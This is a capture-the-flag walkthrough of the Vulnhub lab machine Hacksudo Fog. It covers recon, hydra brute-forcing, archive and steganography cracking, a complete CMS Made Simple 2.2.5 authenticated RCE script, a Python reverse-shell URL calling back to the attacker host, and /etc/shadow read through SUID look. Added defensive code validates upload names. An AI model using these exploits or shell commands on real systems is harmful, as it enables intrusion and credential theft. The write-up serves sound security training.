Hacksudo Fog

Identifying the target host's IP address

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
 192.168.56.100  08:00:27:c9:cb:54      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:6f:3c:95      1      60  PCS Systemtechnik GmbH
```

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.254.

Nmap scan

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 06:34 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      Pure-FTPd
22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 62ce1b7d4e240f8ac1c9eac41e21a7f3 (RSA)
|   256 92045a0a8662b3ba00f3826ac98dae6d (ECDSA)
|_  256 74c57c9f8d06ee0c545e65b230429849 (ED25519)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Hacksudo FOG
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34008/udp6  mountd
|   100005  1,2,3      42789/tcp6  mountd
|   100005  1,2,3      44689/tcp   mountd
|   100005  1,2,3      54872/udp   mountd
|   100021  1,3,4      35042/udp6  nlockmgr
|   100021  1,3,4      36081/tcp6  nlockmgr
|   100021  1,3,4      39467/tcp   nlockmgr
|   100021  1,3,4      57221/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
443/tcp   open  http     Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp  open  nfs_acl  3 (RPC #100227)
3306/tcp  open  mysql    MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 90
|   Capabilities flags: 63486
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSigpipes, FoundRows, InteractiveClient, ODBCClient, ConnectWithDatabase, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: N+*0T4IO5V4>zm7dvD0`
|_  Auth Plugin Name: mysql_native_password
37535/tcp open  mountd   1-3 (RPC #100005)
39467/tcp open  nlockmgr 1-4 (RPC #100021)
44689/tcp open  mountd   1-3 (RPC #100005)
53383/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:6F:3C:95 (Oracle VirtualBox virtual NIC)
Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
```

Getting a shell

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 06:36. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.254:kali): anonymous
331 User anonymous OK. Password required
Password: 
530 Login authentication failed
ftp: Login failed
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ searchsploit Pure-FTPd
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)  | linux/remote/34862.rb
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)         | linux/dos/20479.pl
Pure-FTPd 1.0.48 - Remote Denial of Service                                                | multiple/dos/49105.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

  1. The FTP service is Pure-FTPd; the version is unknown.

  2. Anonymous login is not allowed.

  3. There may be an exploitable vulnerability.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ mysql -uroot -p -h 192.168.56.254
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
```

After a quick attempt, MySQL does not appear to have a weak root password.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ showmount -e 192.168.56.254
Export list for 192.168.56.254:
```

Although the target host runs NFS, no exported share names are returned.

Visiting port 80, the page contains a link to index1.html.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ curl http://192.168.56.254/index1.html
hacksudo-fogTEAM
Hacksudo:FOG-TEAM
Fog Project /fog/index.php]
```

```
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.254/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.254/fog/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
```

The gobuster scan turns up the file dict.txt and the directory /fog, but /fog is of no use.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ wget http://192.168.56.254/dict.txt
--2023-04-25 06:55:23--  http://192.168.56.254/dict.txt
Connecting to 192.168.56.254:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1798 (1.8K) [text/plain]
Saving to: ‘dict.txt’

dict.txt                        100%[=====================================================>]   1.76K  --.-KB/s    in 0s      

2023-04-25 06:55:23 (89.6 MB/s) - ‘dict.txt’ saved [1798/1798]
```

dict.txt is clearly a wordlist.

First, check whether this wordlist can crack SSH. The username is hacksudo (a comment in the page source gives the author's name as hacksudo).

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ hydra -l hacksudo -P dict.txt ssh://192.168.56.254
```

But the attempt does not succeed.

A directory scan below /cms reveals /admin, which is a user login page; next, try Hydra against the login form.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ hydra -l hacksudo -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:14:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking http-post-form://192.168.56.254:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-25 07:14:44

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ hydra -l admin -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"
```

Neither attempt cracks the login.

How did I forget the FTP service? Let's try it:

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.254
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:17:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.56.254:21/
[21][ftp] host: 192.168.56.254   login: hacksudo   password: hackme
```

This yields the FTP username and password.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 07:17. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.254:kali): hacksudo
331 User hacksudo OK. Password required
Password: 
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Extended Passive mode OK (|||62242|)
150 Accepted data connection
drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 .
drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..
-rw-r--r--    1 33         33                389 May  7  2021 flag1.txt
drwxr-xr-x    2 0          0                4096 May  6  2021 hacksudo_ISRO_bak
226-Options: -a -l 
226 4 matches total
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Extended Passive mode OK (|||25989|)
150 Accepted data connection
100% |*********************************************************************************|   389      734.78 KiB/s    00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 0.66 Mbytes per second
389 bytes received in 00:00 (317.62 KiB/s)
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -alh
229 Extended Passive mode OK (|||51758|)
150 Accepted data connection
drwxr-xr-x    2 0          0                4096 May  6  2021 .
drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..
-rw-r--r--    1 0          0                  63 May  5  2021 authors.txt
-rw-r--r--    1 0          0                   0 May  6  2021 installfog
-rw-r--r--    1 0          0             1573833 May  6  2021 secr3tSteg.zip
226-Options: -a -l 
226 5 matches total
ftp> get authors.txt
local: authors.txt remote: authors.txt
229 Extended Passive mode OK (|||6620|)
150 Accepted data connection
100% |*********************************************************************************|    63       90.74 KiB/s    00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 86.65 Kbytes per second
63 bytes received in 00:00 (78.77 KiB/s)
ftp> get installfog
local: installfog remote: installfog
229 Extended Passive mode OK (|||38715|)
150 Accepted data connection
     0        0.00 KiB/s 
226 File successfully transferred
ftp> get secr3tSteg.zip
local: secr3tSteg.zip remote: secr3tSteg.zip
229 Extended Passive mode OK (|||61257|)
150-Accepted data connection
150-The computer is your friend. Trust the computer
150 1536.9 kbytes to download
100% |*********************************************************************************|  1536 KiB  136.22 MiB/s    00:00 ETA
226-File successfully transferred
226 0.010 seconds (measured here), 150.32 Mbytes per second
1573833 bytes received in 00:00 (132.86 MiB/s)
```
```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ cat flag1.txt 
great you done step 1
  ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  
 / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \ 
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
 \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
                 |___/                                               
www.hacksudo.com
```

This gives the first flag.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ zip2john secr3tSteg.zip > hash
ver 2.0 efh 5455 efh 7875 secr3tSteg.zip/hacksudoSTEGNO.wav PKZIP Encr: TS_chk, cmplen=1573432, decmplen=1965596, crc=8B4A9445 ts=9A86 cs=9a86 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** secr3tSteg.zip/secr3t.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=DD73D9B0 ts=9AB0 cs=9ab0 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ ls -alh
total 2.6M
drwxr-xr-x   3 kali kali 4.0K Apr 25 07:19 .
drwxr-xr-x 116 kali kali 4.0K Apr 25 06:33 ..
-rw-r--r--   1 kali kali   63 May  5  2021 authors.txt
-rw-r--r--   1 kali kali 1.8K May  8  2021 dict.txt
-rw-r--r--   1 kali kali  389 May  7  2021 flag1.txt
-rw-r--r--   1 kali kali  20K Nov 27  2020 fog.jpg
-rw-r--r--   1 kali kali  294 Apr 25 07:19 hash
-rw-r--r--   1 kali kali    0 May  6  2021 installfog
-rw-r--r--   1 root root 2.9K Apr 25 06:34 nmap_full_scan
-rw-r--r--   1 kali kali 1.6M May  6  2021 secr3tSteg.zip
-rw-r--r--   1 kali kali 990K May 11  2021 smoke.mp4
drwxr-xr-x   3 kali kali 4.0K Apr 25 06:46 SoundStegno

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ john --show hash
secr3tSteg.zip:fooled::secr3tSteg.zip:secr3t.txt, hacksudoSTEGNO.wav:secr3tSteg.zip

1 password hash cracked, 0 left
```

john recovers the password of the encrypted archive.

Extracting the archive yields the audio file hacksudoSTEGNO.wav; at this point the hint the author gave at the very beginning comes into play.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog/SoundStegno]
└─$ python ExWave.py -f ../hacksudoSTEGNO.wav
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
```

Decode it with a website:

https://www.dcode.fr/shift-cipher
```
wwww.localhost/fog Username=fog:password=hacksudoISRO
```
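The same decoding done locally, as an added example that is not part of the original write-up: a Caesar shift decoder applied to the message ExWave.py printed, plus the general case of trying all 26 shifts and scoring each candidate when the "Shift by 3" hint is absent. The ciphertext constant and the expected plaintext are the ones shown above; the word list used for scoring is an assumption of this example.

```python
# Added example: Caesar/shift-cipher decoding of the message extracted from the WAV.
# Plain Python 3, no third-party dependencies.

import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase

# Message exactly as ExWave.py printed it in the write-up.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def shift_decode(text, shift):
    """Undo a Caesar shift of `shift` positions.

    Case is preserved and every non-letter (digits, '.', '/', '=', ':')
    passes through unchanged, which is what keeps the URL and the
    key=value pairs readable after decoding.
    """
    out = []
    for ch in text:
        if ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) - shift) % 26])
        elif ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) - shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_encode(text, shift):
    """Apply a Caesar shift; the exact inverse of shift_decode."""
    return shift_decode(text, -shift)


def all_shifts(text):
    """Return {shift: candidate plaintext} for every possible key (0..25)."""
    return {k: shift_decode(text, k) for k in range(26)}


# Assumed word list for ranking candidates when no hint is available.
CRIB_WORDS = ("password", "username", "user", "login")


def guess_shift(text, crib_words=CRIB_WORDS):
    """Brute-force all 26 keys and pick the one whose plaintext contains
    the most crib words (case-insensitive). Returns (shift, plaintext).
    Ties resolve to the smallest shift."""
    best_score, best_shift, best_plain = -1, None, None
    for k, plain in all_shifts(text).items():
        score = sum(plain.lower().count(w) for w in crib_words)
        if score > best_score:
            best_score, best_shift, best_plain = score, k, plain
    return best_shift, best_plain


if __name__ == "__main__":
    print(shift_decode(CIPHERTEXT, 3))
    print(guess_shift(CIPHERTEXT))
```

With the hint, `shift_decode(CIPHERTEXT, 3)` produces the line above; without it, `guess_shift` arrives at the same key because only one of the 26 candidates contains "username" and "password".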

With these credentials, the login to /cms/admin succeeds.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ searchsploit -m php/webapps/44976.py
  Exploit: CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44976
     Path: /usr/share/exploitdb/exploits/php/webapps/44976.py
    Codes: CVE-2018-1000094
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/HacksudoFog/44976.py
```

The script has to be adapted to the target, including base_url, username, password, csrf_param and so on.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ cat 44976.py
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094

import requests
import base64

base_url = "http://192.168.56.254/cms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "fog"
password = "hacksudoISRO"
csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = ""

def parse_csrf_token(location):
    return location.split(csrf_param + "=")[1]

def authenticate():
    page = "/login.php"
    url = base_url + page
    data = {
        "username": username,
        "password": password,
        "loginsubmit": "Submit"
    }
    response  = requests.post(url, data=data, allow_redirects=False)
    status_code = response.status_code
    if status_code == 302:
        print "[+] Authenticated successfully with the supplied credentials"
        return response.cookies, parse_csrf_token(response.headers['Location'])
    print "[-] Authentication failed"
    return None, None

def upload_txt(cookies, csrf_token):
    mact = "FileManager,m1_,upload,0"
    page = "/moduleinterface.php"
    url = base_url + page
    data = {
        "mact": mact,
        csrf_param: csrf_token,
        "disable_buffer": 1
    }
    txt = {
        'm1_files[]': (txt_filename, payload)
    }
    print "[*] Attempting to upload {}...".format(txt_filename)
    response = requests.post(url, data=data, files=txt, cookies=cookies)
    status_code = response.status_code
    if status_code == 200:
        print "[+] Successfully uploaded {}".format(txt_filename)
        return True
    print "[-] An error occurred while uploading {}".format(txt_filename)
    return None

def copy_to_php(cookies, csrf_token):
    mact = "FileManager,m1_,fileaction,0"
    page = "/moduleinterface.php"
    url = base_url + page
    b64 = base64.b64encode(txt_filename)
    serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
    data = {
        "mact": mact,
        csrf_param: csrf_token,
        "m1_fileactioncopy": "",
        "m1_path": upload_dir,
        "m1_selall": serialized,
        "m1_destdir": "/",
        "m1_destname": php_filename,
        "m1_submit": "Copy"
    }
    print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
    status_code = response.status_code
    if status_code == 302:
        if response.headers['Location'].endswith('copysuccess'):
            print "[+] File copied successfully"
            return True
    print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
    return None

def quit():
    print "[-] Exploit failed"
    exit()

def run():
    cookies,csrf_token = authenticate()
    if not cookies:
        quit()
    if not upload_txt(cookies, csrf_token):
        quit()
    if not copy_to_php(cookies, csrf_token):
        quit()
    print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)

run()
```
```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ python2 44976.py
[+] Authenticated successfully with the supplied credentials
[*] Attempting to upload cmsmsrce.txt...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell.php...
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: http://192.168.56.254/cms/uploads/shell.php
```
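The weakness the script above relies on is visible in its two steps: the upload accepts a harmless .txt, and the file manager's copy action then accepts any destination name, so the .txt ends up as shell.php inside the web root. The following is an added example, not CMS Made Simple's code and not part of the exploit: the destination-name validation a file-manager copy/rename handler should enforce, and a sweep of an uploads directory that flags anything a PHP-enabled web server would execute. The extension lists, the function names and the sample file tree are assumptions of this example.

```python
# Added example: hardening and detection for the upload-then-rename weakness.
# Python 3 standard library only.

import os
import shutil
import tempfile

# Assumed lists for the example. A real deployment should derive the executable
# set from its own handler configuration (mod_php / PHP-FPM AddHandler rules).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
ALLOWED_EXTENSIONS = {"txt", "jpg", "jpeg", "png", "gif", "pdf", "zip"}


def has_executable_extension(name):
    """True if ANY dotted component after the base name is executable.

    Checking every component, not just the last, catches 'shell.php.txt',
    which some Apache multi-extension handler setups would still execute.
    """
    return any(p in EXECUTABLE_EXTENSIONS for p in name.lower().split(".")[1:])


def destination_name_is_safe(name):
    """Preventive control for the copy/rename/upload destination name.

    Accepts only a bare file name (no directory part, no traversal, no NUL,
    not hidden) with at least one extension, where every extension is on the
    allow list. Everything else is rejected, so 'shell.php' can never be
    chosen as a destination regardless of what the source file contained.
    """
    if not name or name in (".", "..") or name != os.path.basename(name):
        return False
    if "\x00" in name or name.startswith("."):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False  # require an explicit extension so the allow list applies
    if has_executable_extension(name):
        return False
    return all(ext in ALLOWED_EXTENSIONS for ext in parts[1:])


def find_executable_uploads(upload_dir):
    """Detective control: walk an uploads tree and return the relative paths
    of files a PHP server would execute. An uploads directory should never
    contain such files, so any hit is alert-worthy however it got there."""
    hits = []
    for root, _dirs, files in os.walk(upload_dir):
        for fname in files:
            if has_executable_extension(fname):
                hits.append(os.path.relpath(os.path.join(root, fname), upload_dir))
    return sorted(hits)


def demo():
    """Build a throwaway uploads tree mirroring the write-up (constructed
    file names) and sweep it; returns the list of flagged files."""
    tmp = tempfile.mkdtemp()
    try:
        for fname in ("cmsmsrce.txt", "shell.php", "logo.png"):
            open(os.path.join(tmp, fname), "w").close()
        return find_executable_uploads(tmp)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for candidate in ("cmsmsrce.txt", "shell.php", "shell.php.txt", "../notes.txt"):
        print(candidate, "->", "allowed" if destination_name_is_safe(candidate) else "rejected")
    print("flagged in sweep:", demo())
```

The allow-list check belongs on the server side of every operation that names a file (upload, copy, rename, extract); the sweep is cheap enough to run from cron or a file-integrity job and would have flagged shell.php the moment it appeared in /cms/uploads.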

The script runs successfully.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ curl http://192.168.56.254/cms/uploads/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The next step is to obtain a shell.

```
http://192.168.56.254/cms/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
```

The reverse shell from the target host arrives on Kali Linux.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 44348
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:~/html/cms/uploads$ cd /home
cd /home
www-data@hacksudo:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x  6 root root 4.0K May  8  2021 .
drwxr-xr-x 20 root root 4.0K May  9  2021 ..
drwxr-xr-x  3 root root 4.0K May  7  2021 backups
drwxr-xr-x  2 root root 4.0K May  8  2021 fogDBbackups
drwxr-x---  4 1001 1001 4.0K May  6  2021 fogproject
drwxr-x---  5 isro isro 4.0K May 13  2021 isro
```

```
www-data@hacksudo:~$ cat flag2.txt
cat flag2.txt
you successfully crack web and got shell access!!!
                                   _         _       _   _             
  ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  
 / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \ 
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
 \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
                 |___/                                               
step 2 done.
     _               ____  
 ___| |_ ___ _ __   |___ \ 
/ __| __/ _ \ '_ \    __) |
\__ \ ||  __/ |_) |  / __/ 
|___/\__\___| .__/  |_____|
            |_|            
```

This gives the second flag.

```
www-data@hacksudo:~/html/cms$ cat config.php
cat config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'cmsms';
$config['db_password'] = 'password';
$config['db_name'] = 'cmsms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'Asia/Kolkata';
```

This gives the database username and password; connect to the database:

```
www-data@hacksudo:~/html/cms$ mysql -ucmsms -p
mysql -ucmsms -p
Enter password: password
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 949
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| cmsms_db           |
| information_schema |
+--------------------+

MariaDB [cmsms_db]> select * from cms_users;
select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+
| user_id | username | password                         | admin_access | first_name | last_name | email               | active | create_date         | modified_date       |
+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+
|       1 | hacksudo | cd658361db0ee541e7fc728aba5570d3 |            1 |            |           | info@hacksudo.com   |      1 | 2021-05-10 05:01:14 | 2021-05-11 23:49:00 |
|       2 | fog      | cd658361db0ee541e7fc728aba5570d3 |            1 | sudo       |           | vishal@hacksudo.com |      1 | 2021-05-11 23:48:24 | 2021-05-11 23:48:24 |
+---------+----------+----------------------------------+--------------+------------+-----------+---------------------+--------+---------------------+---------------------+
```
```
www-data@hacksudo:/home$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
```

The SUID bit on look can be used to escalate privileges.

```
www-data@hacksudo:/home$ LFILE=/etc/shadow
LFILE=/etc/shadow
www-data@hacksudo:/home$ /usr/bin/look '' "$LFILE"
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
```

Crack isro's password with john.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ cat isro_hash
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::

┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt isro_hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty           (isro)     
1g 0:00:00:00 DONE (2023-04-25 08:08) 9.090g/s 2327p/s 2327c/s 2327C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

This recovers isro's password.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ ssh isro@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:FfPfu4QjjjHuWE3UZ3+9fKmCs9MSH7JibTk2QXKelwc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
isro@192.168.56.254's password: 
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

